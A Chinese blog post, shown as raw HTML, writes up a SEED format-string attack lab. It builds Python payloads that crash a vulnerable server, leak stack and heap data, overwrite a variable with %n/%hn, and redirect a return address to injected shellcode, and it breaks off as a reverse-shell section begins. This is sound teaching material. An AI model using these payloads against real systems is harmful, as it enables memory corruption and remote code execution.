<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sekla.cn","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="​    格式化字符串，通常作为打印类函数的第一个参数，是用于指定c语言中printf等函数应按什么格式打印，通常格式指定在%分隔符后，如果程序允许用户提供整个格式化字符串部分，但是又没有检查格式化字符串的输入，就会导致恶意代码的攻击。 实验指导我们进行程序崩溃，读取程序内存等攻击。 实验环境准备首先关闭地址随机化。 实验提供被攻击的程序为format.c，这个程序有一个格式化字符串漏洞，我们的任">
<meta property="og:type" content="article">
<meta property="og:title" content="Seed安全实验系列-(4)-Format-String攻击实验">
<meta property="og:url" content="http://sekla.cn/2021/12/01/ss-lab4-printf/index.html">
<meta property="og:site_name" content="Sekla&#39;s Blog">
<meta property="og:description" content="​    格式化字符串，通常作为打印类函数的第一个参数，是用于指定c语言中printf等函数应按什么格式打印，通常格式指定在%分隔符后，如果程序允许用户提供整个格式化字符串部分，但是又没有检查格式化字符串的输入，就会导致恶意代码的攻击。 实验指导我们进行程序崩溃，读取程序内存等攻击。 实验环境准备首先关闭地址随机化。 实验提供被攻击的程序为format.c，这个程序有一个格式化字符串漏洞，我们的任">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/11/30/Gb8WftmdwvIpP76.png">
<meta property="og:image" content="https://i.loli.net/2021/11/30/Zq3uE7A5eGB8SnX.png">
<meta property="og:image" content="https://i.loli.net/2021/12/01/s8Qxzf4B52Mcym9.png">
<meta property="og:image" content="https://i.loli.net/2021/12/01/lDvREMTO61thV8e.png">
<meta property="og:image" content="https://i.loli.net/2021/12/01/D2MIlTN8kisuJ9b.png">
<meta property="og:image" content="https://i.loli.net/2021/12/01/Ul36R18nstprkjY.png">
<meta property="og:image" content="https://i.loli.net/2021/12/01/58WURvEe6sZTu4z.png">
<meta property="og:image" content="https://i.loli.net/2021/12/03/spTUwLeOA34dnGx.png">
<meta property="og:image" content="https://i.loli.net/2021/12/03/ICyaZiEB4w8K12A.png">
<meta property="og:image" content="https://i.loli.net/2021/12/03/pYvAgzn9wOa78XW.png">
<meta property="og:image" content="https://i.loli.net/2021/12/03/KgiUSud1TakyrL5.png">
<meta property="og:image" content="https://i.loli.net/2021/12/03/OYT59Xru3jgli4z.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/04/T1AWNyB3GZzHnr9.png">
<meta property="article:published_time" content="2021-12-01T04:00:00.000Z">
<meta property="article:modified_time" content="2021-12-04T08:58:00.642Z">
<meta property="article:author" content="Sekla">
<meta property="article:tag" content="Linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/11/30/Gb8WftmdwvIpP76.png">

<link rel="canonical" href="http://sekla.cn/2021/12/01/ss-lab4-printf/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Seed安全实验系列-(4)-Format-String攻击实验 | Sekla's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  <script type="text/javascript" src="/js/my_js/clicklove.js"></script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Sekla's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Keep Learning Keep Doing</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">14</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">23</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">100</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://sekla.cn/2021/12/01/ss-lab4-printf/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Sekla">
      <meta itemprop="description" content="Sekla">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sekla's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Seed安全实验系列-(4)-Format-String攻击实验
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-12-01 12:00:00" itemprop="dateCreated datePublished" datetime="2021-12-01T12:00:00+08:00">2021-12-01</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-12-04 16:58:00" itemprop="dateModified" datetime="2021-12-04T16:58:00+08:00">2021-12-04</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">软件安全</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/Seed%E5%AE%89%E5%85%A8%E5%AE%9E%E9%AA%8C%E7%B3%BB%E5%88%97/" itemprop="url" rel="index"><span itemprop="name">Seed安全实验系列</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>8k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>7 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>​    格式化字符串，通常作为打印类函数的第一个参数，是用于指定c语言中printf等函数应按什么格式打印，通常格式指定在%分隔符后，如果程序允许用户提供整个格式化字符串部分，但是又没有检查格式化字符串的输入，就会导致恶意代码的攻击。</p>
<p>实验指导我们进行程序崩溃，读取程序内存等攻击。</p>
<h2 id="实验环境准备"><a href="#实验环境准备" class="headerlink" title="实验环境准备"></a>实验环境准备</h2><p>首先关闭地址随机化。</p>
<p>实验提供被攻击的程序为format.c，这个程序有一个格式化字符串漏洞，我们的任务便是攻击这个漏洞。</p>
<p>可以看到程序使用函数myprintf调用printf函数，将buf指针作为参数传入myprintf函数，显而易见没有提供格式化字符串指定直接打印是非常危险的。程序将会作为root权限运行在服务器上，并且它的标准输入将会重定向到TCP链接，程序可以真正获得数据从用户。</p>
<p><strong>编译环境</strong>：我们会编译format程序作为32位和64位程序，所有的命令makefile已经提供，make即可。编译之后，我们需要复制二进制文件到fmt-containers文件夹，然后就可以作为容器使用。</p>
<p>在编译过程，编译器显然会对printf函数warning，作为实验直接忽略。还需要加上可执行栈编译参数。</p>
<p>**服务器程序:**server.c文件提供服务的主要入口，监听9090端口，当接收到TCP链接，它调用format程序，并设置TCP链接作为format程序的标准输入，当format程序读取到stdin的数据，它实际上是读取的TCP链接中的数据。服务器程序中添加了一点随机性，所以不同的学生可能会看到  </p>
<p>内存地址和帧指针的不同值。 这些值只在容器重新启动时更改，因此只要保持容器运行，就会看到相同的数字(不同学生看到的数字仍然不同)。 这种随机性不同于地址随机化对策。 它的唯一目的是让学生的作业有点不同。 </p>
<a id="more"></a>

<h2 id="TASK1-程序崩溃"><a href="#TASK1-程序崩溃" class="headerlink" title="TASK1 程序崩溃"></a>TASK1 程序崩溃</h2><p>首先启动docker compose通过配置文件，两个容器会被启动，这个任务使用10.9.0.5上的服务器，运行32位格式化字符串漏洞程序。首先发送一个开始信息到服务器，我们可以发现接下来的信息被打印出来在目标容器上。</p>
<p>首先启动容器之后，输入<code>echo hello | nc 10.9.0.5 9090</code>，可以看见在server上打印出了</p>
<p><img src="https://i.loli.net/2021/11/30/Gb8WftmdwvIpP76.png" alt="image-20211130192247305"></p>
<p>即本次实验所需要的数据。</p>
<p>服务器会接受至多1500字节的数据，实验的主要任务便是构建不同的payload来攻击。如果保存payload在一个文件里，使用<code>cat &lt;file&gt; | nc 10.9.0.5 9090</code>来攻击。</p>
<p>我们的任务便是提供一个输入到服务器，当服务器程序尝试打印用户输出即在myprintf函数中，然后就崩溃了。可以通过myprintf函数是否返回判断攻击是否成功。通过attack-code目录中的py文件来构造payload。</p>
<p><img src="https://i.loli.net/2021/11/30/Zq3uE7A5eGB8SnX.png" alt="image-20211130194008372"></p>
<p>通过py文件构造badfile输入后，函数没有正确返回，成功崩溃。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Initialize the content array</span></span><br><span class="line">N = <span class="number">1500</span></span><br><span class="line">content = bytearray(<span class="number">0x0</span> <span class="keyword">for</span> i <span class="keyword">in</span> range(N))</span><br><span class="line"></span><br><span class="line"><span class="comment"># This line shows how to store a 4-byte integer at offset 0</span></span><br><span class="line">number  = <span class="number">0xbfffeeee</span></span><br><span class="line">content[<span class="number">0</span>:<span class="number">4</span>]  =  (number).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># This line shows how to store a 4-byte string at offset 4</span></span><br><span class="line">content[<span class="number">4</span>:<span class="number">8</span>]  =  (<span class="string">&quot;abcd&quot;</span>).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># This line shows how to construct a string s with</span></span><br><span class="line"><span class="comment">#   12 of &quot;%.8x&quot;, concatenated with a &quot;%n&quot;</span></span><br><span class="line">s = <span class="string">&quot;%.8x&quot;</span>*<span class="number">12</span> + <span class="string">&quot;%n&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># The line shows how to store the string s at offset 8</span></span><br><span class="line">fmt  = (s).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line">content[<span class="number">8</span>:<span class="number">8</span>+len(fmt)] = fmt</span><br></pre></td></tr></table></figure>

<p>通过py文件发现，N为要填充的大小，然后对要填充的大小进行填充0x0，number即要存取的4字节整形变量在offset=0，同理下面相同。</p>
<h2 id="TASK2-打印服务器程序内存"><a href="#TASK2-打印服务器程序内存" class="headerlink" title="TASK2 打印服务器程序内存"></a>TASK2 打印服务器程序内存</h2><h3 id="A-栈数据"><a href="#A-栈数据" class="headerlink" title="A.栈数据"></a>A.栈数据</h3><p>目标是在栈上打印数据，多少个%x指定需要来让服务器程序打印出第一个4字节，我们可以放一些特别的4字节数据。</p>
<p>构造py文件：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&quot;%x.&quot;</span>*<span class="number">64</span></span><br><span class="line">fmt  = (s).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line">content[<span class="number">4</span>:<span class="number">4</span>+len(fmt)] = fmt</span><br><span class="line"></span><br><span class="line">number = <span class="number">0x12345678</span></span><br><span class="line">content[<span class="number">0</span>:<span class="number">4</span>]  =  (number).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>当试错到64个%x时，发现我们写入的数据0x12345678:</p>
<p><img src="https://i.loli.net/2021/12/01/s8Qxzf4B52Mcym9.png" alt="image-20211201165235824"></p>
<h3 id="B-堆数据"><a href="#B-堆数据" class="headerlink" title="B.堆数据"></a>B.堆数据</h3><p>secret字符串信息存储在堆上，从服务器打印信息可以查看地址，任务是打印出这个信息。所以要把这个信息的地址存放在格式化字符串中。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&quot;%x&quot;</span>*<span class="number">63</span>+<span class="string">&quot;%s&quot;</span></span><br><span class="line">fmt  = (s).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line">content[<span class="number">4</span>:<span class="number">4</span>+len(fmt)] = fmt</span><br><span class="line"></span><br><span class="line">number = <span class="number">0x080b4008</span></span><br><span class="line">content[<span class="number">0</span>:<span class="number">4</span>]  =  (number).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>修改一下A中的py文件，然后将信息地址写入并将最后一个作为%s类型打印即可。</p>
<p><img src="https://i.loli.net/2021/12/01/lDvREMTO61thV8e.png" alt="image-20211201170435651"></p>
<h2 id="TASK3-修改服务器程序内存"><a href="#TASK3-修改服务器程序内存" class="headerlink" title="TASK3 修改服务器程序内存"></a>TASK3 修改服务器程序内存</h2><p>​    该任务目的是修改target变量值，已经在程序中被定义为0x11223344。</p>
<h3 id="A-修改值"><a href="#A-修改值" class="headerlink" title="A.修改值"></a>A.修改值</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&quot;%x&quot;</span>*<span class="number">63</span>+<span class="string">&quot;%n&quot;</span></span><br><span class="line">fmt  = (s).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line">content[<span class="number">4</span>:<span class="number">4</span>+len(fmt)] = fmt</span><br><span class="line"></span><br><span class="line">number = <span class="number">0x080e5068</span></span><br><span class="line">content[<span class="number">0</span>:<span class="number">4</span>]  =  (number).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Write the content to badfile</span></span><br><span class="line"><span class="keyword">with</span> open(<span class="string">&#x27;badfile&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">  f.write(content)</span><br></pre></td></tr></table></figure>

<p>加上%n即可将之前打印出的字符写入到0x080e5068这个地址上，即target值。</p>
<p><img src="https://i.loli.net/2021/12/01/D2MIlTN8kisuJ9b.png" alt="image-20211201185304769"></p>
<p>可以看到0x11223344被修改成0x000000ec。</p>
<h3 id="B-改成0x5000"><a href="#B-改成0x5000" class="headerlink" title="B.改成0x5000"></a>B.改成0x5000</h3><p>把target值改成特定的0x5000，要进行额外字符填充，将%x输出精度强制扩展，0x5000-4=0x4ffc=20476，总共填充63个%x，20476/63=325，则62个精度325的%x和一个326精度的%x：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&quot;%.325x&quot;</span>*<span class="number">62</span>+<span class="string">&quot;%.326x&quot;</span>+<span class="string">&quot;%n&quot;</span></span><br><span class="line">fmt  = (s).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line">content[<span class="number">4</span>:<span class="number">4</span>+len(fmt)] = fmt</span><br><span class="line"></span><br><span class="line">number = <span class="number">0x080e5068</span></span><br><span class="line">content[<span class="number">0</span>:<span class="number">4</span>]  =  (number).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># or</span></span><br><span class="line">s = <span class="string">&quot;%325x&quot;</span>*<span class="number">62</span>+<span class="string">&quot;%326x&quot;</span>+<span class="string">&quot;%n&quot;</span></span><br><span class="line">fmt  = (s).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line">content[<span class="number">8</span>:<span class="number">8</span>+len(fmt)] = fmt</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/12/01/Ul36R18nstprkjY.png" alt="image-20211201192530069"></p>
<p>成功将值改为0x00005000.</p>
<h3 id="C-改成0xAABBCCDD"><a href="#C-改成0xAABBCCDD" class="headerlink" title="C.改成0xAABBCCDD"></a>C.改成0xAABBCCDD</h3><p>按以上方法改成这么大的值显然填充这么大数据是非常耗时间的。所 以将AABB，CCDD分割，一次填充2个字节，即%hn，target地址分割成两部分，一个是在0x080e5068上修改，一个是0x080e5070上修改。但是AABB比CCDD小，所以先写高地址。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&quot;%.8x&quot;</span>*<span class="number">62</span>+<span class="string">&quot;%.43199x&quot;</span>+<span class="string">&quot;%hn&quot;</span>+<span class="string">&quot;%.8738x&quot;</span>+<span class="string">&quot;%hn&quot;</span></span><br><span class="line">fmt  = (s).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line">content[<span class="number">12</span>:<span class="number">12</span>+len(fmt)] = fmt</span><br><span class="line"></span><br><span class="line">number = <span class="number">0x080e506a</span></span><br><span class="line">content[<span class="number">0</span>:<span class="number">4</span>]  =  (number).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line">content[<span class="number">4</span>:<span class="number">8</span>]  =  (<span class="string">&quot;@@@@&quot;</span>).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">number1 = <span class="number">0x080e5068</span></span><br><span class="line">content[<span class="number">8</span>:<span class="number">12</span>]  =  (number1).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>首先修改0x080e506a高地址为0xaabb，由于已经打印了62<em>8+12个字符，所以打印43199=0xaabb-(62\</em>8+12)，然后低地址打印0xccdd-0xaabb=8738个字符。要用@@@@或者其他字符分割地址。</p>
<h2 id="TASK4-注入恶意代码"><a href="#TASK4-注入恶意代码" class="headerlink" title="TASK4 注入恶意代码"></a>TASK4 注入恶意代码</h2><p>​    将一段恶意代码以二进制格式注入到服务器的内存中，然后使用格式字符串漏洞修改函数的返回地址字段，这样当函数返回时，它跳转到我们注入的代码。 此任务使用的技术与前一个任务相似:它们都修改内存中的4字节数。 前一个任务修改目标变量，而这个任务修改函数的返回地址字段。需要根据服务器打印的信息找出返回地址字段的地址。  </p>
<h3 id="认识栈布局"><a href="#认识栈布局" class="headerlink" title="认识栈布局"></a>认识栈布局</h3><p> 图1描述了堆栈布局。 应该注意的是，我们有意在main函数和myprintf函数之间放置了一个栈帧，但是图中没有显示它。 </p>
<p><img src="https://i.loli.net/2021/12/01/58WURvEe6sZTu4z.png" alt="image-20211201211422469"></p>
<h4 id="Q1：2和3的内存地址是什么"><a href="#Q1：2和3的内存地址是什么" class="headerlink" title="Q1：2和3的内存地址是什么"></a>Q1：2和3的内存地址是什么</h4><p>可在打印出看出：</p>
<p><strong>The input buffer’s address:    0xffffd0d0</strong></p>
<p><strong>Frame Pointer (inside myprintf):      0xffffcff8</strong></p>
<p>0xffffcff8+4即return address的地址，<strong>2</strong>：0xffffcffc  <strong>3</strong>：0xffffd0d0</p>
<h4 id="Q2：需要多少个-x让格式化字符串参数指针移动到3？"><a href="#Q2：需要多少个-x让格式化字符串参数指针移动到3？" class="headerlink" title="Q2：需要多少个%x让格式化字符串参数指针移动到3？"></a>Q2：需要多少个%x让格式化字符串参数指针移动到3？</h4><p>即va_list指针从format string帧上方地址移动到buf首地址。根据前面的实验，可知需要64个%x。</p>
<p><strong>format string:    0xffffcfd0-4=0xffffcfcc</strong>，由于va_list从format string高4位地址开始移动。</p>
<p><strong>0xffffcffc-0xffffcfd0/4=11</strong>即：</p>
<p>11个%x可以移动到return address</p>
<h3 id="shellcode"><a href="#shellcode" class="headerlink" title="shellcode"></a>shellcode</h3><p>​    实验提供的shellcode来运行/bin/bash，同时给予-c参数，命令行将运行作为第二个参数的命令。这些字符串末尾的*只是一个占位符，在shell代码执行期间，它将被一个字节0x00替换。 每个字符串需要在末尾有一个零，但我们不能在shell代码中放入零。 相反，我们在每个字符串的末尾放置一个占位符，然后在执行期间动态地在占位符中放置一个零。  如果我们想让shell代码运行一些其他命令，我们只需要修改命令字符串3一致。 然而，在进行更改时，我们需要确保不改变这个字符串的长度，因为argv[]数组占位符的起始位置，正好在字符串命令之后。</p>
<h3 id="Task"><a href="#Task" class="headerlink" title="Task"></a>Task</h3><p>​    任务是构造字符串与恶意代码，然后提供给服务器程序来运行，同时让程序成功运行bin/bash也是无用的，需要构建一个反向shell来对这个bash输入命令。</p>
<p>首先进行第一步，要让server程序运行注入的shellcode，即覆盖返回地址内容到我们恶意代码的位置，即buff[0]=0xffffd0d0+offset，由于buff内还需要存我们的格式化字符串，所以整个shellcode可以适当后移，先打印返回地址上的值：</p>
<p><img src="https://i.loli.net/2021/12/03/spTUwLeOA34dnGx.png" alt="image-20211203140419019"></p>
<p>先构造：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">number = <span class="number">0xffffcffe</span></span><br><span class="line">content[<span class="number">0</span>:<span class="number">4</span>]  =  (number).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line">content[<span class="number">4</span>:<span class="number">8</span>]  =  (<span class="string">&quot;@@@@&quot;</span>).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">number1 = <span class="number">0xffffcffc</span></span><br><span class="line">content[<span class="number">8</span>:<span class="number">12</span>]  =  (number1).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>同理先修改低地址，再修改高地址。</p>
<p>这里修改shellcode起始位置为：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Put the shellcode somewhere in the payload</span></span><br><span class="line">start = <span class="number">100</span>             <span class="comment"># Change this number</span></span><br><span class="line">content[start:start + len(shellcode)] = shellcode</span><br></pre></td></tr></table></figure>

<p>由于填充NOP指令，只需要在一个范围内都应该可以跳转到恶意代码位置，我们让返回地址修改成offset=1500-len(start)的位置，可以设置为0xffffd0d0+1000的位置，然后对返回地址开始进行修改。</p>
<p>同理构造字符串修改返回地址：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&quot;%.8x&quot;</span>*<span class="number">62</span>+<span class="string">&quot;%.53948x&quot;</span>+<span class="string">&quot;%hn&quot;</span>+<span class="string">&quot;%.11079x&quot;</span>+<span class="string">&quot;%hn&quot;</span></span><br><span class="line">fmt  = (s).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line">content[<span class="number">12</span>:<span class="number">12</span>+len(fmt)] = fmt</span><br><span class="line"></span><br><span class="line">number = <span class="number">0xffffcffc</span></span><br><span class="line">content[<span class="number">0</span>:<span class="number">4</span>]  =  (number).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line">content[<span class="number">4</span>:<span class="number">8</span>]  =  (<span class="string">&quot;@@@@&quot;</span>).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">number1 = <span class="number">0xffffcffe</span></span><br><span class="line">content[<span class="number">8</span>:<span class="number">12</span>]  =  (number1).to_bytes(<span class="number">4</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/12/03/ICyaZiEB4w8K12A.png" alt="image-20211203151413416"></p>
<p>成功执行shellcode。</p>
<h4 id="反向shell"><a href="#反向shell" class="headerlink" title="反向shell"></a>反向shell</h4><p>​    改一下shellcode即可：</p>
